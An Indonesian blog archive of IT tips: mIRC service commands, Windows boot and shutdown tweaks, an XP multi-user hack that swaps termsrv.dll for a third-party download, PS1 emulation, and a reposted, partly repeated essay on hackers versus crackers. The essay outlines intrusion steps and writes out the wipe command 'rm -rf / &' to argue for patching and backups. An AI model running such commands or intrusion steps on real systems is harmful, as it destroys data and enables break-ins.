Jumat, 29 Agustus 2008

INFORMATION TEKNOLOGI

INFORMATION TEKNOLOGI

Kadang kenyataan tidak sesuai dengan harapan kita, namun dalam kondisi apapun kita harus selalu optimis dan jangan pernah lelah untuk belajar karena manusia yang menguasai teknologi dimanapun akan selalu dicari dan dihargai dan yang harus di ingat tak ada kesuksesan tanpa suatu kerja keras.....! jangan lupa untuk selalu ingat dengan siapa yang telah menciptakan kita bersukur lebih baik dari pada hanya terus mengeluh
Senin, 2007 September 17
PC Media Anti Virus
Semakin hari ternyata penyebaran virus komputer semakin luar biasa saja. Mulai dari orang awam sampai perusahaan multinasional sekalipun tak luput dari serangan virus komputer. Ini di luar prediksi kebanyakan orang sebelumnya yang mengira tingkat keamanan Windows XP sudah cukup untuk menghambat penyebaran virus. Jaman berubah. Membuat virus komputer kini dapat dengan mudah dilakukan, bahkan dengan Visual Basic sekalipun. Internet dan USB Flash Disk merupakan media utama penyebaran virus-virus saat ini, terutama di Indonesia. Tetapi, faktor utama tetap pada kelalaian manusianya (atau kecerdasan si pembuatnya ya?).
Anda masih dibikin pusing dengan Virus Brontok. Udah gak jamannya lagi. Sekarang telah hadir Anvirus lokal yang mampu membabat Virus ini yang menurut kabar telah memiliki 17 varian. Anti virus buatan tim majalah PC Media ini mengklaim mampu membersihkan komputer anda dari si rontokbro sampai hilang 100%. Hebat bukan…
Namun saat ini meskipun antivirus nya gratis anda harus membeli PC media seharga 39.000 sedang untuk versi ekonomis 15.000 atau pinjem ke teman yang punya CD nya
Namun anda yang tidak punya kesempatan tersebut jangan berkecil hati, karena dapat di download.
Klik Untuk Download
Diposting oleh widayats STIMIK ROSMA di 01:25
1 komentar Label: VIRUS
Link ke posting ini
Command - Command mIRC
1. Register Channel = /cs register (#channel) (passwd) (desikripsi)
2. Identify Channel = /cs identify (#channel) (passwd)
3. Successor = /cs set (#channel) successor (nickname)
4. Drop Channel = /cs drop (#channel)
5. Ganti Pass Channel = /cs set (#channel) passwd (pass lama) (pass baru)
6. Lupa Pass Channel = /cs sendpass (#channel) (email)
7. Founder Baru (Identify #Channel Dulu) = /cs set (#channel) founder
8. Mailblock = /cs set (#channel) mailblock (on/off)
9. Private = /cs set (#channel) private (on/off)
10. Set Description = /cs set (#channel) desc (deskripsinya)
11. Set Topic = /cs set (#channel) topik (topiknya)
12. Set URL = /cs set (#channel) url (alamat url-nya)
13. Set Mlock = /cs set (#channel) mlock (tulis modenya)
14. Set Restrict = /cs set (#channel) restrict (on/off)
15. Set KeepTopic = /cs set (#channel) keeptopic (on/off)
16. Set TopikLock = /cs set (#channel) topikclock (off/sop/founder)
17. Set Memo Channel = /cs set (#channel) memo (none/aop/sop/founder)
18. Set OP-Guard = /cs set (#channel) opguard (on/off)
19. Add/Del Sop = /cs sop (#channel) (add/del) (nick)
20. Add/Del Aop = /cs aop (#channel) (add/del) (nick)
21. Lihat List Op = /cs (aop/sop) (#channel) list
22. Akick Nick = /cs akick (#channel) (add/del) (Nick!*@*)
23. Akick Ident = /cs akick (#channel) (add/del) (*!ident@*)
24. Akick IP Address = /cs akick (#channel) (add/del) (*!*@IP Addressnya)
25. Akick List = /cs akick (#channel) list
26. Op List = /cs (sop/aop) (#channel) list
27. Lihat Akses = /cs why (#channel) (nick)
28. Unban = /cs unban (#channel) (nick)
29. Invite = /cs invite (#channel) (nick)
30. Info = /cs info (#channel)
31. Access Channel = /cs access (#channel) (nick op)
32. Count = /cs count (#channel)

NickServ :

1. Register Nick = /ns register (password) (email)
2. Identify Nick = /ns identify (password)
3. Ganti Pass = /ns set passwd (passwd lama) (passwd baru)
4. Enforce = /ns set enforce (on/off)
5. Kill Ghost = /ns ghost (nick) (passwd)
6. Kill = /ns set kill (on/off)
7. Recover = /ns recover (nick) (passwd)
8. Release = /ns release (nick) (passwd)
9. Drop = /ns drop (nick)
10. No Op = /ns set noop (on/off)
11. No Memo = /ns set nomemo (on/off)
12. Info = /ns info (nickname)
13. URL = /ns set url (http:// )
14. Ganti Email = /ns set email (password) (emailnya)
15. Showemail = /ns set showemail (on/off)
16. MailBlock = /ns set mailblock (on/off)

MemoServ :

1. Send Nick = /ms send (nickname) (pesan)
2. Send OP = /ms send (#channel) (pesan)
3. Send SOP = /ms sendsop (#channel) (pesan)
4. Lihat Memo = /ms list
5. Baca Memo = /ms read (no. list memo)
6. Hapus Memo = /ms del (no. list memo)
7. Hapus Semua = /ms del all

Perintah Dasar mIRC :

1. Ganti nick = /nick (nick baru)
2. Notice = /notice (nick) (pesan)
3. Masuk Channel = /join (#channel)
4. Keluar Channel = /part (#channel)
5. Keluar IRC = /quit (pesan)
6. Ganti Server = /server (nama server)
7. Private = /query (nick)
8. Invite = /invite (nick) (#channel)
9. Mode I = /mode (nick) +I
10. Ignore = /ignore (nick)
11. Action = /me (pesan)
12. Whois = /whois (nick)
13. Away = /away (pesan)
14. Balik Away = /away
15. Ping = /ping (nick)
16. Bersihkan layar = /clear

Perintah Standar Untuk Op Channel :

/kick (#channel) (nick) = kick user
/topik (#channel) (topiknya) = mengganti topik channel
/kick (#channel) (nick) (alasan) = kick user dengan alasan
/mode (#channel) +b *!*@IPnya = Band IP user, missal /mode #channel +b *!*@202.146.12.*
/mode (#channel) +b nick!*@* = Ban nick user, missal /mode #channel +b nick!*@*
/mode (#channel) +o (nick) = memberikan Op pada user
/mode (#channel) +v (nick) = memberikan voice pada user
/mode (#channel) -o (nick) = menurunkan user agar tidak Op lagi
/mode (#channel) -v (nick) = mengambil voice user
/mode (#channel) +/- ntispklRrmc = set mode channel
/channel = melihat mode dan ban list channel
Diposting oleh widayats STIMIK ROSMA di 01:22
0 komentar Label: TEKNOLOGI
Link ke posting ini
APAKAH TCP / IP ITU ?
Konsep Dasar TCP/IP
Penulis by Dayats

TCP/IP merupakan dasar dari segalanya, tanpa mempelajari TCP/IP kemungkinan kita tidak dapat melakah maju di dunia pehackingan. Dengan kata lain, TCP/IP merupakan awal dari segalanya. Banyak orang yg menyepelekan pentingnya mempelajari TCP/IP, mereka mengaku dirinya "hacker" tetapi tidak mengerti sama sekali apa itu TCP/IP. Merasa hacker hanya apabila bisa mencrash ataupun menjebol server, tetapi sebetulnya bukan itulah maksud dari segala itu. Hacker itu adalah orang yg haus akan pengetahuan, bukan haus akan penghancuran. Untuk menjadi hacker dibutuhkan kerja keras, semangat, motivasi yg tinggi serta pemahaman seluk-beluk internet itu sendiri, tanpa hal-hal tersebut mustahil anda dapat menjadi seorang hacker yang tangguh.

Tulisan ini didedikasikan terutama untuk member Kecoak Elektronik dan siapa saja yang ingin mempelajari TCP/IP, bukan untuk mereka yang hanya ingin mencari jalan pintas menjadi hacker sejati. Bagi anda yg memang udah profhacking mungkin tulisan ini tidak penting, karena memang tulisan ini hanyalah pengantar belaka dan bukan merupakan referensi yg sempurna (dan jauh dari sempurna) oleh karenanya hanya dikhususkan bagi mereka yg pendatang baru (newbies).

Kita akan membahas :
1. Apa Itu TCP/IP ?
2. Apa yg membuat TCP/IP menjadi penting ?
3. Bagaimana awalnya keberadaan TCP/IP ?
4. Layanan apa saja yg diberikan oleh TCP/IP ?
5. Bagaimanakah bentuk arsitektur dari TCP/IP itu ?
6. Bagaimana TCP dan IP bekerja ?
7. Bagaimanakah bentuk format header protokol UDP,TCP,IP ?

Klik Disini Untuk Artikel Selengkapnya
Diposting oleh widayats STIMIK ROSMA di 01:17
0 komentar Label: heckers
Link ke posting ini
PERCEPAT BOOTING
Pada saat komputer mulai dijalankan, maka ada salah satu proses yang harus dijalankan, yaitu booting. Proses ini sangat sederhana, namun terkadang cukup memakan waktu. Apalagi jika komputer Anda memiliki banyak sekali atribut. Padahal sebenarnya lama waktu booting dapat diminimalisasi dengan langkah-langkah berikut:

1. Lokasi Booting
Pencarian lokasi booting oleh komputer juga dapat memakan waktu. Secara default, biasanya komputer akan memeriksa floopy terlebih dahulu. Anda dapat mengubah hal ini dengan masuk ke dalam BIOS. Caranya tekan Del setelah perhitungan memory dilakukan. Lalu pada opsi FirtsBoot Device pilihlah harddisk di mana Anda meletakkan operating system. Misalnya ‘hard disk 0.’ Dengan cara ini, komputer tidak akan memakan waktu lagi mencari lokasi booting, tapi langsung ke harddisk tempat operating system disimpan.

2. Kurangi Proses Deteksi HDD
Mengurangi proses deteksi terhadap drive yang ada dalam komputer Anda juga dapat mempercepat proses booting. Untuk beberapa motherboard, memungkinkan Anda untuk mendeteksi secara manual. Artinya tidak lagi komputer yang melakukan, tetapi user sudah menentukan terlebih dahulu. Semua hal ini dapat dilakukan dalam BIOS setup. Cara masuknya sama seperti langkah pertama, yaitu tekan Del setelah perhitungan memory dilakukan.

3. Disable-kan Komponen Tak Terpakai
Semua perangkat yang terpasang pada komputer akan memakan waktu booting. Oleh sebab itu, ada baiknya bila Anda mengurangi komponen-komponen yang tidak terpakai ini. Caranya, yaitu dengan membuka Device Manager pilih komponen yang tidak lagi terpakai, namun masih terpasang dalam komputer Anda (misalnya Floopy drive). Klik dua kali, lalu pililih disable pada drop down box Device Usage. Device Manager sendiri dapat diakses dengan cara, klik kanan pada My Computer, pilih properties, lalu buka halaman Hardware.

4. Kurangi Font
Jumlah font yang terlalu banyak dapat membuat proses booting melambat. Oleh sebab itu, salah satu cara yang juga dianggap efektif adalah dengan mengurangi jumlah font yang diinstal. Caranya buatlah sebuah folder khusus, kemudian pindahkan semua font dalam folder font di control panel ke dalamnya. Kemudian barulah pilih kembali mana saja font yang Anda butuhkan saja. Jangan khawatir terhadap hilangnya font yang sementara waktu, karena Windows secara otomatis akan menginstal kembali font-font dasar.

5. Hilangkan Layar Loading
Dengan menghilangkan layar loading, Anda juga dapat menghemat waktu booting. Caranya pilih menu Run pada Start menu, lalu ketikkan msconfig, lau tekan Ok. Setelah itu pada opsi /NOGUIBOOT berikan tanda centang. Hal ini akan membuat pada proses booting komputer tidak akan menampilkan logo Windows dan animasinya, melainkan hanya layar hitam yang kosong. Anda tidak perlu khawatir, sebab dengan tidak adanya logo dan animasi ini, proses booting dapat dihemat beberapa detik.

6. Kurangi Waktu Setelah Booting
Selesai booting, komputer akan terasa sangat lambat untuk digunakan. Hal ini disebabkan adanya proses pengenalan jaringan yang dilakukan oleh komputer. Bila Anda ingin segera menggunakan komputer dan komputer tidak terhubung dengan jaringan, makan cara yang sangat efektif adalah mematikan fitur ini. Caranya klik kanan pada My Computer, pilih manage. Lalu expan Service and Application. Pada daftar service, klik dua kali Workstation. Kemudian pada dropdown box Star Up type pilih Disable.

7. Nonaktifkan Service yang Tidak Perlu
Ada beberapa service yang jalan secara otomatis ada juga beberapa service yang jalan pada saat start up dan sebagian besar ada juga yang tidak diperlukan. Sehingga hanya akan memakan waktu dan resource saja. Sebaiknya service-service tersebut dimatikan. Caranya seperti pada langkah nomor 6. Hanya saja, Anda sendiri yag menentukan service mana saja yang Anda kenal dan dirasa tidak dibutuhkan. Lakukan penonaktifan seperti halnya langkah sebelumnya.
Diposting oleh widayats STIMIK ROSMA di 01:14
0 komentar Label: TEKNOLOGI
Link ke posting ini
MEMPERCEPAT SHUT DOWN
Mematikan komputer adalah pekerjaan yang sangat mudah. Namun, pekerjaan penutup ini kadang cukup menjengkelkan, apalagi bila kita dikejar waktu. Tidak jarang selain membutuhkan waktu yang hampir sama dengan proses booting, kadang proses shut down tidak berjalan sebagai mana mestinya,sehingga tetap harus ditunggu. Oleh sebab itu, tidak ada salahnya jika Anda menyimak langkah berikut agar proses mematikan komputer dapat membuat Anda lebih nyaman.

1. Shortcut Shut Down
Salah satu cara yang paling cepat untuk untuk mematikan komputer adalah tanpa melalui start menu. Anda dapat menyediakan shortcut khusus pada layar desktop bila ingin mematikan komputer dengan lebih cepat. Caranya cukup mudah. Yaitu, dengan mengklik kanan pada layar desktop, lalu pilih New, Shortcut. Setelah itu, pada layar Create Shortcut, masukkan ‘SHUTDOWN -s -t 01’ lalu tekan tombol Next. Setelah itu, masukkan nama untuk shortcut tersebut. Anda dapat menamakan shortcut ini dengan julukan ‘Shut down’ Lalu tekan tombol Finish.

2. Kurangi Wit Times 1
Selesai membuat menu pintas untuk mematikan komputer, Anda dapat mengatur waktu yang diperlukan untuk menutup aplikasi ke batas minimum. Artinya dengan memberikan waktu sekecil mungkin agar waktu yang dibutuhkan untuk mematikan komputer akan lebih cepat. Caranya adalah dengan menjalankan Registry editor, lalu pilih dalam ‘HKEY_CURRENT_USER\Control Panel\Desktop\pilih ‘WaitToKillAppTimeout’. Setelah itu, ubah nilainya dari 20000 menjadi 1000 agar dapat lebih cepat.

3. Kurangi Wait Times 2
Akses registry editor dengan cara pilih Run dalam start menu lalu ketiklah regedit, kemudian tekan Enter. Setelah itu tekan Ctrl+F kemudian cari ‘HKEY_USERS\.DEFAULT\Control Panel\Desktop’, setelah itu ubahlah nilai ‘WaitToKillAppTimeout’ dari 20000 menjadi 1000. Jika merasa terlalu cepat, Anda juga dapat mengaturnya sampai kecepatan 5000 atau 10000. Waktu ini terkadang tidak terlalu diperlukan, bila Anda sudah terlebih dahulu mematikan semua aplikasi sebelum komputer dimatikan.

4. Kurangi Wait Times 3
Akses kembali registry editor seperti pada langkah-langkah selanjutnya, lalu carilah ‘HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\. Setelah itu, cari ‘WaitToKillServiceTimeout’. Klik dua kali pada nama tersebut, kemudian ubah nilai value data-nya dari 20000 menjadi 1000. Jika yang sebelumnya adalah waktu maksimal untuk aplikasi dimatikan atau diselesaikan, maka langkah ini adalah menentukan untuk service yang sedang aktif.

5. Auto Kill Task
Salah satu yang memperlambat proses shut down adalah adanya aplikasi yang hang (tidak responsif) dan meminta input-an user untuk menentukan apakah aplikasi tetap akan ditutup atau tidak. Anda dapat membuat komputer secara otomatis mematikan aplikasi dengan cara mengedit value data ‘AutoEndTask’ menjadi 1. Opsi ini ada di dalam ‘HKEY_USER\Control Panel\Desktop’ dan ‘HKEY_USERS\Control Panel\Desktop’. Dengan cara ini pula, semua aplikasi yang aktif akan dimatikan secara otomatis oleh sistem. Oleh sebab itu, Anda harus yakin bahwa aplikasi tidak lagi digunakan setiap akan mematikan komputer.

6. Jalankan Hibernasi
Anda juga dapat memilih menjalankan hibernasi. Karena Anda tidak akan dipertanyakan apakah ada aplikasi yang tidak responsif atau tidak. Opsi hibernasi terdapat dalam Power Option yang ada pada Control Panel. Namun sebelum mengaktifkan fitur ini, pastikan ruang harddisk tempat sistem operasi berada masih memiliki sekitar 300 MB. Ruang yang dibutuhkan oleh hibernasi adalah untuk menyimpan status komputer (aplikasi apa saja yang sedang dibuka) agar pada saat kembali dari hibernasi, komputer dapat langsung
mengaksesnya.

Matikan nVIDIA Driver Helper Service
Bagi Anda yang memiliki video card dengan chipset nVIDIA terkadang pada saat komputer melakukan proses shut down terdapat sedikit delay atau jeda karena helper service yang dilakukan oleh chipset nVIDIA. Oleh sebab itu, Anda harus mematikannya dengan cara buka computer management (klik kanan pada My Computer, manage). Lalu pada daftar service cari ‘Nvidia Driver Helper’, setelah itu klik kanan dan pilih Properties. Setelah itu pada drop down box ‘Startup Type’pilih disable dan tekan tombol OK. Hal ini dapat saja berlaku untuk VGA lain yang chipset-nya memberikan service serupa.
Diposting oleh widayats STIMIK ROSMA di 01:09
0 komentar Label: TEKNOLOGI
Link ke posting ini
LOGIN MULTI USER PADA WINDOWS XP
Keren sebetulnya yah, hanya saja, Windows hanya mengijinkan satu user saja yang boleh aktif pada satu sesi. Mungkin masalah sekuriti sehingga Windows memblok akses lebih dari 1 user, sehingga user yang aktif mau ga mau harus logout. Untungnya ada sedikit trik, sehingga kita bisa mengakali windows agar bisa mengijinkan kita menggunakan remote desktop secara multiuser.
Perhatian… Ini adalah salah satu bentuk hack. Segala akibat yang timbul adalah merupakan resiko anda sendiri…

Langkah 1:
Restart Windows dan masuk ke SafeMode. Klik kanan pada My Computer lalu pilih Properties, masuk ke tab Remote, dan hilangkan tanda centang pada pilihan “Allow user to connect remotely to this computer”. Jika sudah tidak ada tanda centang, jangan berbuat apa2, diclose aja.

Langkah 2:
Klik Start - Control Panel - Adminsitrative Tools, lalu pilih Services. Double Klik pada Terminal Services yang ada pada list, lalu pilih Disable pada Startup Type option.

Langkah 3:
Kita memerlukan sebuah file dengan nama termsrv.dll, tapi kita akan mendownload versi yang lama. bisa didownload disini: http://www.orbitfiles.com/download/id20947665. lalu pergilah ke folder windows/system32, rename file termsrv.dll menjadi nama lain, misal termsrv.org, lalu copykan file termsrv.dll yang baru saja kita download ke folder ini. dengan cara yang sama juga, lakukan terhadap file termsrv.dll yang ada di folder windows/system32/dllcache, direname, trus copykan file yang baru didownload.

Langkah 4:
Buka registry windows, lewat regedit. Cari key berikut:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
buat key baru dengan nilai DWORD, “EnableConcurrentSessions” (tanpa tanda petik), kemudian edit dan set nilainya menjadi 1, lalu exit dari regedit.

Langkah 5:
Klik Start, Run, ketikkan gpedit.msc. Lalu buka Computer Configuration > Administrative Templates > Windows Components > Terminal Services
double klik “Limit number of connections”, pilih “Enabled” dan masukkan nilai maksimum dari jumlah koneksi yang ingin kita ijinkan (2 ato lebih), kemudian Restart Windows pada mode normal.

Langkah 6:
Dan akhirnya ulangi langkah no 1, hanya saja kali ini kita harus memastikan ada tanda centang pada option “Allow user to connect remotely to this computer”.
Lalu pergilah ke Terminal Services (lihat langkah 2) lalu set startup type menjadi “Manual”
restart windows dan sampai pada langkah ini, kompie kita akan dapat menerima multiple sesi dari remote desktop.

Saya sudah mencoba teknik ini dan berhasil pada Windows XP pro, saya belum mencoba di windows xp sp2, tapi saya rasa mungkin bisa. Akhirnya semua kembali kepada kita masing2, apakah kita akan menggunakan cara ini untuk efisiensi kerja? atau sebaliknya kita pake untuk mengintip kompie orang lain?
Diposting oleh widayats STIMIK ROSMA di 01:06
0 komentar Label: TEKNOLOGI
Link ke posting ini
Memainkan Game PS 1 Di PC
Membongkar koleksi cd PS1 tidak pernah semenarik ini!
Dan mungkin ada yang belum tahu cara memainkan game PS1 di PC, atau belum tahu cara menggunakan shader di emulator. Jadi saya akan menjelaskan step-step sederhananya.
1.Pastikan anda memiliki PC yang berjalan sempurna. Beneran, step satu ini beberapa kali terlupakan oleh saya. Kalau perlu, download driver terbaru dari VGA card anda.
2.Download emulator PS1, saya rekomendasikan ePSXe
3.Download BIOS untuk PS1. dapat dengan mudah didapatkan di google. Cari saja bios untuk scph1001 atau scph
4.Download Plugin untuk ePSXe, bisa didapatkan di tempatnya si Pete. Downloadlah Graphical Plugin (itu yang utama), dan sebagai tambahan download saja sekalian Plugin untuk sound, controller, dan lain-lain. Kecil kok. Jangan lupa masukkan semua plugin ke folder plugin di foldernya ePSexe.
5.Sekarang Download shadernya. Hm, ini bisa dicari di forumnya Pete, forumnya ngemu, dan di beberapa tempat lain. Tapi Pete punya koleksi Shader yang cukup lengkap dan bagus di situsnya.
6.Voila. Tinggal dicoba. Secara garis besar, atur Video Confignya semampu PC anda, checklist screen filtering dan shader effect. Pilihlah shader effect sesuai jenis shader yang akan anda gunakan (ada 2 jenis program, untuk yang ekstensionnya vp/fp atau slf/slv). Klik tombol di sebelah kanan shader effect, dan cari shader yang mau anda gunakan. Bagian itu saya bold karena ada beberapa orang yang kesulitan di bagian itu.
7.Selamat Nostalgia!

Belajar Menjadi Hacker

Belajar Menjadi Hacker
Diarsipkan di bawah: Onno W. Purbo — kang deden @ 2:54 pm

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Belajar Menjadi Hacker

Belajar Menjadi Hacker
Diarsipkan di bawah: Onno W. Purbo — kang deden @ 2:54 pm

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

